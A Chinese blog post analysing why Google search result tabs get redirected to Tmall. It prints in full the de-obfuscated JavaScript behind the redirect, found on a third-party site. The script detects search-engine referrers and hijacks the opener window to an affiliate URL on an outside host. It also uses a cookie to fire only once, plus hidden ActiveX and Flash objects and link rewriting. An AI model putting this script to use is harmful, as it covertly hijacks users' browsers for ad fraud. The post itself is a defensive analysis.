今天看到一个帖子询问该内容,以前也碰到过没有注意,以为是ISP投放的广告,今天分析了下。
从效果上来说很像搜索引擎自己投放的,不过仔细一想,能挂广告的地方很多并不需要这种大大降低体验的方式来投放广告,首先看下案例,在Google上搜索硬盘 C7,标题为“有C7错误的硬盘们都注意了 - 电脑新生代”的快照,然后会在新页面打开,原Google搜索结果页跳转到了天猫。
通过Chrome的开发工具抓包:
会在打开新页面的时候搜索结果页面请求该URL,这个页面的代码就不贴了,由于该跳转只跳转一次,我估计得判断cookie,所以查看了下结果页面的cookie:
首先判断下是不是从cookie判断的,是的话就应该不是搜索引擎的问题了,经过尝试就是上图说圈的内容,删除之后又会跳转。
找找新页面的js,找到下面的内容:
打开该URL的js查看内容是eval加密,解密后的结果如下:
if ("undefined" == typeof(_5had0w)) {
_5had0w = [];
_5had0w.ssite = new RegExp("(www.baidu.com)|(www.google.c)|(www.youdao.com)|(search.cn.yahoo.com)|(search.yahoo.com)|(114search.118114.cn)|(bing.118114.cn)|(search.114.vnet.cn)|(bing.com)|(www.soso.com)|(www.sogou.com)|(www.taobao.com)|(gougou.com)|(www.gouwo.com)|(cache.baidu.com)|(m.baidu.com)|(baidu.asp)|(hao123.com)|(265.com)|(114la.com)|(115.com)|(etao.com)", "i");
_5had0w.win = window;
try {
if (parent && parent.f && parent.document.getElementById("fulliframe")) {
_5had0w.win = parent
}
} catch(e) {}
_5had0w.host = _5had0w.win.location.host;
if (!_5had0w.host) _5had0w.host = "";
_5had0w.getcookie = function (sName) {
var aCookie = document.cookie.split("; ");
for (var i = 0; i < aCookie.length; i++) {
var aCrumb = aCookie[i].split("=");
if (sName == aCrumb[0]) return unescape(aCrumb[1])
}
return ""
};
_5had0w.setcookie = function (sValue) {
date = new Date();
date.setMinutes(date.getMinutes() + 6);
document.cookie = "oc_busy=" + escape(sValue) + "; expires=" + date.toGMTString() + ";path=/"
};
_5had0w.hcode = _5had0w.host.replace(/(www|blog|bbs)\./ig, "").charCodeAt(0);
if (isNaN(_5had0w.hcode)) _5had0w.hcode = 0;
_5had0w.mall = "htt" + "p://s.t" + "kur" + "l.c" + "om/gom" + "all.ht" + "ml?";
_5had0w.powerboom = function () {
try {
var urlp = _5had0w.mall + "p";
if (document.attachEvent) {
_5had0w.pnode.launchURL(urlp);
_5had0w.pnode = null;
self.focus()
}
} catch(e) {}
};
_5had0w.nvPower = function () {
try {
if (document.attachEvent) {
_5had0w.pnode = document.createElement("<object width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'></object>");
window.attachEvent("onunload", _5had0w.powerboom)
}
} catch(e) {}
};
_5had0w.detachPower = function () {
try {
if (window.detachEvent) {
_5had0w.pnode = null;
window.detachEvent("onunload", _5had0w.powerboom)
}
} catch(e) {}
};
_5had0w.nvEnter = function () {
_5had0w.detachPower();
_5had0w.setcookie("_mall");
_5had0w.win.location = _5had0w.mall + "e"
};
_5had0w.shadowClick = function () {
setTimeout(_5had0w.nvEnter, 1500);
return true
};
_5had0w.np = false;
_5had0w.nvIt = function (lochref) {
try {
_5had0w.win.opener.location = lochref
} catch(e) {
try {
_5had0w.win.opener.navigate(lochref)
} catch(e2) {
try {
_5had0w.win.opener.opener.navigate(lochref)
} catch(e3) {
_5had0w.nvPower();
_5had0w.np = true
}
}
}
};
_5had0w.nvUrl = function () {
var _co = _5had0w.getcookie("oc_busy");
if (_co == "" || _co.indexOf("mall") < 0) {
_5had0w.nvIt(_5had0w.mall + "n");
if (!_5had0w.np) {
_5had0w.setcookie(_co + "_mall")
}
}
};
if (_5had0w.win.opener) {
if (_5had0w.ssite.test(_5had0w.win.document.referrer)) {
_5had0w.nvUrl()
}
}
_5had0w.appendChild = function (html) {
var node = document.createElement("DIV");
node.style.width = "0";
node.style.height = "0";
node.style.position = "absolute";
node.style.left = "-100px";
node.innerHTML = html;
document.body.appendChild(node)
};
_5had0w.appendScript = function () {
if (1 > arguments.length) return;
var node = document.createElement("DIV");
node.style.width = "0";
node.style.height = "0";
node.style.position = "absolute";
node.style.left = "-100px";
for (var i = 0; i < arguments.length; i++) node.appendChild(document.createElement('script')).src = arguments[i];
document.body.appendChild(node)
};
_5had0w.oload = function () {
if (document.body == null) {
setTimeout(_5had0w.oload, 200)
} else {
var fp = "htt" + "p://s.t" + "kur" + "l.c" + "om/bro" + "adp.s" + "wf";
var pm = "d=" + _5had0w.host.replace(/(www|blog|bbs)\./ig, "").charAt(0);
try {
if ((!document.attachEvent) || navigator.userAgent.indexOf("Opera") > -1) {
pm += "&b=ff"
}
} catch(e) {}
var str = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="0" height="0"><param name="allowScriptAccess" value="always"/><param name="movie" value="' + fp + '"/><param name="flashVars" value="' + pm + '"/><embed src="' + fp + '" flashVars="' + pm + '" width="0" height="0" allowScriptAccess="always" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></object>';
_5had0w.appendChild(str);
if (_5had0w.np) {
var ls = document.links;
if (ls.length && ls.length > 0) {
for (var i = 0; i < ls.length; i++) {
if (ls[i].href.indexOf("javascript") < 0) {
ls[i].target = "_blank";
ls[i].onclick = _5had0w.shadowClick
}
}
}
}
}
};
try {
if (document.attachEvent) {
window.attachEvent("onload", _5had0w.oload)
} else {
window.addEventListener("load", _5had0w.oload, false)
}
} catch(e) {}
}
具体内容一看代码就知道了,我反正是半懂不懂的,具体解决方法的话可以尝试加黑名单,不过具体还应该是浏览器方面的问题吧,通过一个页面的js可以控制其他页面跳转?
转载请注明: 本文《关于通过搜索引擎跳转到淘宝问题》来源于bstaint的博客
没有评论:
发表评论